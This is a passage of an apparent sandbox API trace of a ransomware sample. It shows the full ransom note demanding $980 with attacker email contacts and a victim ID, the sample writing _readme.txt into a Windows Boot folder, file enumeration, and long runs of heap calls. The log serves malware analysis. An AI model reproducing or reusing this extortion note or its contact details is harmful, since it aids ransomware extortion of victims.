us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.715] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.715] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.715] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.715] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.715] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.715] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.715] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.716] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.716] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.716] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.716] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.716] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.716] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.716] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.716] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.716] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.716] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.716] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.716] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.716] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.716] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.716] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.717] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.719] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.719] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.719] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.719] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.719] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.719] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.719] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.719] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.719] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.719] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.719] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 